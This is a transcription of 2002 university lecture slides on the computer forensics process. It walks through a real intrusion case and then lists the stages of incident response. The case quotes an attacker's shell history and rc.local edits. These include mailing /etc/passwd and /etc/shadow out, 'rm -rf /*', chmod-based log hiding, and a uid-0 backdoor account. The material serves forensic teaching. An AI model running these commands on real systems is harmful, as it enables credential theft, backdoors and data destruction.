Computer Forensics Process



Similar documents
Know Your Enemy: A Forensic Analysis

INASP: Effective Network Management Workshops

Unix Sampler. PEOPLE whoami id who

13. Configuring FTP Services in Knoppix

APPLICATION NOTE. How to build pylon applications for ARM

Secure File Transfer Installation. Sender Recipient Attached FIles Pages Date. Development Internal/External None 11 6/23/08

Fundamentals of UNIX Lab Networking Commands (Estimated time: 45 min.)

Linux System Administration on Red Hat

Command Line Crash Course For Unix

INCIDENT RESPONSE & COMPUTER FORENSICS, SECOND EDITION

Secure Shell Demon setup under Windows XP / Windows Server 2003

An Introduction to the Linux Command Shell For Beginners

Lab 2: Secure Network Administration Principles - Log Analysis

New Lab Intro to KDE Terminal Konsole

Unless otherwise noted, all references to STRM refer to STRM, STRM Log Manager, and STRM Network Anomaly Detection.

Installing Virtual Coordinator (VC) in Linux Systems that use RPM (Red Hat, Fedora, CentOS) Document # 15807A1-103 Date: Aug 06, 2012

Birmingham Environment for Academic Research. Introduction to Linux Quick Reference Guide. Research Computing Team V1.0

Introduction to Operating Systems

Linux command line. An introduction to the Linux command line for genomics. Susan Fairley

How to upload - copy PowerChute Network Shutdown installation files to VMware VMA from a PC

INCIDENT RESPONSE CHECKLIST

Fred Hantelmann LINUX. Start-up Guide. A self-contained introduction. With 57 Figures. Springer

INF-110. GPFS Installation

Do it Yourself System Administration

Running a Default Vulnerability Scan

Cisco Networking Academy Program Curriculum Scope & Sequence. Fundamentals of UNIX version 2.0 (July, 2002)

Introduction to AIX 6L System Administration Course Summary

Linux Overview. Local facilities. Linux commands. The vi (gvim) editor

dotdefender v5.12 for Apache Installation Guide Applicure Web Application Firewall Applicure Technologies Ltd. 1 of 11 support@applicure.

TEL2821/IS2150: INTRODUCTION TO SECURITY Lab: Operating Systems and Access Control

Pen Test Tips 2. Shell vs. Terminal

Getting Physical with the Digital Investigation Process

Thirty Useful Unix Commands

Syntax: cd <Path> Or cd $<Custom/Standard Top Name>_TOP (In CAPS)

KEY STEPS FOLLOWING A DATA BREACH

SAS 9.4 In-Database Products

Running a Default Vulnerability Scan SAINTcorporation.com

How To Set Up A Network Map In Linux On A Ubuntu 2.5 (Amd64) On A Raspberry Mobi) On An Ubuntu (Amd66) On Ubuntu 4.5 On A Windows Box

Beyond Windows: Using the Linux Servers and the Grid

ICS 351: Today's plan

Tutorial 0A Programming on the command line

Installation Guide for WebSphere Application Server (WAS) and its Fix Packs on AIX V5.3L

Tutorial Guide to the IS Unix Service

Lab 1: Network Devices and Technologies - Capturing Network Traffic

USEFUL UNIX COMMANDS

Incident Response and Forensics

Network Security Policy: Best Practices White Paper

A candidate following a programme of learning leading to this unit will be able to:

CA ehealth. Remote Poller Guide. r6.1

CERIAS Tech Report GETTING PHYSICAL WITH THE DIGITAL INVESTIGATION PROCESS. Brian Carrier & Eugene H. Spafford

Application Intrusion Detection

NEW JERSEY STATE POLICE EXAMPLES OF CRIMINAL INTENT

Bottom line you must be compliant. It s the law. If you aren t compliant, you are leaving yourself open to fines, lawsuits and potentially closure.

NERSP: Saving File Space and Reducing File Storage Charges

Using Secure4Audit in an IRIX 6.5 Environment

Shellshock Security Patch for X86

Penetration Testing Report Client: Business Solutions June 15 th 2015

4PSA Total Backup User's Guide. for Plesk and newer versions

QuickBooks Enterprise Solutions. Linux Database Server Manager Installation and Configuration Guide

Version 1.0. File System. Network Settings

Building Elastix-2.4 High Availability Clusters with DRBD and Heartbeat (using a single NIC)

HSearch Installation

How to build secure Apache Tomcat deployments with RPM.

Installation & Configuration Guide for Solaris 8

Anatomy of a Breach: A case study in how to protect your organization. Presented By Greg Sparrow

Tutorial: Using WestGrid. Drew Leske Compute Canada/WestGrid Site Lead University of Victoria

CPSC2800: Linux Hands-on Lab #3 Explore Linux file system and file security. Project 3-1

Installing a Symantec Backup Exec Agent on a SnapScale Cluster X2 Node or SnapServer DX1 or DX2. Summary

IT Essentials II: Network Operating Systems V 3.0

Backup of ESXi Virtual Machines using Affa

How to install PowerChute Network Shutdown on VMware ESXi 3.5, 4.0 and 4.1

XGenPlus Installation Guide

INSTALLING KAAZING WEBSOCKET GATEWAY - HTML5 EDITION ON AN AMAZON EC2 CLOUD SERVER

Unix/Linux Forensics 1

HP Education Services

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

Linux System Administration. System Administration Tasks

Installing IBM Websphere Application Server 7 and 8 on OS4 Enterprise Linux

PBX Fraud Information

Basic Linux & Package Management. Original slides from GTFO Security

File Transfer Best Practices

2 Advanced Session... Properties 3 Session profile... wizard. 5 Application... preferences. 3 ASCII / Binary... Transfer

Web Hosting: Pipeline Program Technical Self Study Guide

Hacking Database for Owning your Data

EMC VNX Version 8.1 Configuring and Using the Audit Tool on VNX for File P/N Rev 01 August, 2013

WinSCP PuTTY as an alternative to F-Secure July 11, 2006

Single Node Hadoop Cluster Setup

Navigating the Rescue Mode for Linux

SmartFiler Backup Appliance User Guide 2.0

Installing the SSH Client v3.2.2 For Microsoft Windows

Extending Remote Desktop for Large Installations. Distributed Package Installs

1 Basic commands. 2 Terminology. CS61B, Fall 2009 Simple UNIX Commands P. N. Hilfinger

SysAid IT On-Demand Architecture Including Security and Disaster Recovery Plan

UNIX / Linux commands Basic level. Magali COTTEVIEILLE - September 2009

SIOS Protection Suite for Linux v Postfix Recovery Kit Administration Guide

Ubuntu Professional Training Course Overview (E-learning, Ubuntu LTS)

Exercises: FreeBSD: Apache and SSL: pre SANOG VI Workshop

How To Run The Nessus 6 Vulnerability Scanner On A Pc Or Mac Or Linux (For A Non-Procedure) On A Microsoft Mac Or Pc Or Linux On A Mac Or Mac (For An Unprocedured Pc Or

NetNumen U31 R06. Backup and Recovery Guide. Unified Element Management System. Version: V

Transcription:

About term paper and course project! Primary objectives I expect that you can learn not only the knowledge but also the research approaches such that you can have a better preparation to start your own work in the future.! Copyright I discussed this issue with Dr. Somani, Dr. Davis, and others. I never thought to let the students to turn over their copyright to me. If we work together, we have joint copyright (in fact, my part belongs to ISU, not me). If you do it by yourself, you own the copyright. Once the paper is fortunately published, IEEE/ACM has the copyright (not us). I am happy to provide help to you and work with you to go through all the stages in this process and will try my best.! Topics for Term papers You can choose one from the list I gave last time. You are welcome to propose your own topic. Computer Forensics Process Yong Guan 3216 Coover Tel: (515) 294-8378 Email: guan@ee.iastate.edu Sept. 12, 2002 1

Today! Case Study! Goal of Computer Forensics! Computer Forensics Process " Pre-incident preparation " Detection of incidents " Initial Response " Response Strategy Formulation " Duplication " Investigation " Security countermeasure deployment " Network Monitoring " Recovering " Reporting and follow-up Case Study! From the book Incident Response: Investigating Computer Crime by Mandia and Prosise.! This is a real case. The real identities of the victim, attacker, the agents, and IP addresses involved in the case have been changed.! On Sept. 3, 2000, business at ABC Retailers came to a halt, since none of the ABC employees were able to access the customer transaction database: # The database tracked all on-line and off-line retail sales made by ABC. # Unable to identify customers or provide the products sold to the customers within the last 24-30 hours. # Lost a full day of retail transactions and estimated cost between $60,000 and $100,000. 2

What had happened?! A chilling and angering fact Someone had logged in and deleted the database!!! Clues? # Victim system: UNIX # UNIX usually maintains a history of commands executed by a user: history file # Some questionable actions related to the account: bruce! History file reviewed by ABC and FBI confirm that # ABC database system was hacked, # A sniffer was compiled, # And the database was deleted. 98 lines of history file 1. Ls 2. P 3. W 4. Who 5. Pwd 6. Cat /etc/passwd 7. Cat /etc/pass 8. Cat /etc/passwd mail s ownd badboy@fantasy.com 9. Cat /etc/passwd mail s ownd badboy@fantasy.com 10. Cat /etc/passwd mail badboy@fantasy.com 3

98 lines of history file (cont.) 11. Lynx packetstorm.security.com 12. ftp 31.27.11.7 13. ftp 31.27.11.7 14. Ls tla /sbin 15. Ls tla /usr/sbin 16. Adduser 17. Useradd 18. Ls tla /sbin/*user* 19. Ls tla /bin/*user* 20. Ls tla /usr/sbin/*user* 21. /usr/sbin/useradd 22. /usr/sbin/useradd bsmith 23. /usr/sbin/useradd bsmith 98 lines of history file (cont.) 24. Ls -tla 25. pine 26. mail 27. mail 28. exit 29. ftp 31.27.11.7 30. Mkdir..hello 31. Mv ss.tgz..hello 32. Cd..hello 33. Which tar 34. Tar zxvf ss.tgz 35. gunzip 36. Gunzip d ss.tgz 37. Tar xvf ss.tar 4

98 lines of history file (cont.) 38. Cd ss-1.3 39. Ls 40../configure 41. Make 42. Find / -name ip_var.h* 43. Find 44. Who 45. Exit 46. Ls 47. ftp 31.27.11.7 98 lines of history file (cont.) 48. Mkdir /usr/include/netinet 49. Bash 50. Ls 51. Ls tla 52. Mv *.h..hello 53. Rm ss.tar 54. Ls 55. Cd..hello 56. Ls 57. Cd ss* 58. Cd ss-1.3 59. Ls 60. Grep netinet 61. Grep netinet * 62. Pwd 63. Pico 64. Sed s/netinet/\/home/brucer/..hello 65. Sed s/netinet/\/ home/brucer/..hello /ss.c 66. exit 5

98 lines of history file (cont.) 67. Ps aux more 68. Ps ax 69. Ps aef more 70. Ls 71. Cd..hello 72. Ls 73. Pwd 74. ftp 31.27.11.7 75. Mv ss.c ss-1.3 76. Cd ss-1.3 77../configure 78. Make 79. Make install 98 lines of history file (cont.) 80. Make I 81. Ls 82. Uname a 83. Whereis ifconfig 84. Ifconfig a 85. /ifconfig eth1 86. /sbin/ifconfig h 87. Ifconfig h 88. Which ifconfig 89. /usr/sbin/ifconfig h 90. Cd / 91. Ls 92. Rm rf rd /* remove the ABC database */ 6

98 lines of history file (cont.) 93. W 94. Man wall 95. Wall hello I have just hacked into your system have a nice day 96. Whereis wall 97. /usr/sbin/wall 98. exit After reviewing this log file! Confirm whether the legitimate user brucer used these UNIX commands at that time Conclusion is NO. Then who did these?! ABC investigated the firewall logs and confirmed that brucer was not responsible for the connections logged by the firewall. Sept 3 18:26:39 firewall in.telnetd[16382]: connect from 31.27.11.7 Sept 3 18:26:45 firewall login: LOGIN ON 1 BY BRUCER from 31.27.11.7 Sept 3 18:33:42 firewall in.telnetd[16390]: connect from 31.27.11.7 Sept 3 18:33:47 firewall login: LOGIN ON 1 BY BRUCER from 31.27.11.7 Sept 3 18:40:54 firewall in.telnetd[16399]: connect from 31.27.11.7 Sept 3 18:40:59 firewall login: LOGIN ON 1 BY BRUCER from 31.27.11.7 7

After reviewing this log file! IP address 31.27.11.7 was familiar to the ABC technician and it belonged to one of the primary venture capital firm backing ABC - New York City Ventures.! On 31.27.11.7, rc.local file was edited: 1. Chmod 0 /root/.bash_history 2. Chmod 0 /var/log/* 3. Chmod 0 /usr/local/psionic/portsentry/* 4. Touch /tmp/admin 5. Chmod 0 /tmp/admin 6. Ifconfig a >> /tmp/admin 7. Ps aux >>/tmp/admin 8. Cat /etc/passwd >>/tmp/admin 9. Cat /etc/shadow >>/tmp/admin After reviewing this log file! On 31.27.11.7, rc.local file was edited: 10. Echo bsmith:$1$/t0rj9wq$qb1ruracpjemapvh1kkkb:0:0::/:/bin/bash >> /etc/passwd 11. Echo bsmith:x:0:0::/:/bin.bash >>/etc/shadow 12. Mail s startup hacker@fantasy.com < /tmp/admin 13. Rm f /tmp/admin 14. Chmod 744 /var/log/* 15. Chmod 744 /usr/local/psionic/portsentry/* 16. Echo uptime >>~/.bash_history 17.Echo du. m >> ~/.bash_history 18. Echo w >> ~/.bash_history 8

After reviewing this log file! FBI needed to determine who used the email addresses:! badboy@fantasy.com and hacker@fantasy.com! FBI requested court order 2703d on Sept 12, 2000 and obtained from freemail.com (i.e., fantasy.com) that the source IP addresses of the system accessed both email accounts are the same and the subscriber for badboy@ is Jeff Wylde and for hacker@ is Carlos Fernandez (real identity).! The phone records of Fernandez was obtained and found that the time correlation between phone record and firewall logs. After reviewing this log file! President of NY city venture firm confirmed Fernadez was the former security employee and perhaps he still had root access.! FBI searched Fernandez s home and found:! The content of the email by freemail.com for hacker@ and badboy@ accounts contained information stolen from the ABC server and NY city venture firm.! This case study shows a basic process of computer forensics. 9

A graphical depiction of the case Attacker??? SSH into a dial up NYC Ventures Rc.local mails password file No relavant logs found ABC Brucer history file Database deleted To hacker@fantasy.com To badboy@fantasy.com Freemail.com 2703d Goal: find a individual use both email acoounts ABC log badboy@ NYC Ventures hacker@ Computer Forensics Process " Pre-incident preparation " Detection of incidents " Initial Response " Response Strategy Formulation " Duplication " Investigation " Security countermeasure deployment " Network Monitoring " Recovering " Reporting and follow-up 10

Pre-incident preparation " We recognize some computer security incidents are beyond our control. " What we can do is to prepare for them to the best of our abilities. $ Obtaining tools/techniques $ Enhancing host/network logging Detection of incidents Firewall logs IDS logs Suspicious user Detect Notification checklist completed Response team activated System administrator 11

Initial Response Details from the notification checklist Prepared response team Initial Response Verified information about the incident Response Strategy Formulation Verified information about the Incident Response Posture Formulate Response Strategy Managementapproved Action Plan 12

Duplication " Make a complete forensic duplication of the relevant facts, e.g., potential evidence, live evidence, Investigation Live System Network logs Forensic Duplication Investigation Investigative Report 13

Security countermeasure deployment Verified information about the incident Network Logs Response Posture Implementing Security Remedies Monitor Isolate and Contain Network Monitoring " Decide what, where, how to monitor 14

Recovering Investigative Conclusions Successful Isolation and Containment Recovery Report Reporting and follow-up " Supporting criminal or civil prosecutions " Producing final reports " Suggesting process improvement 15

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information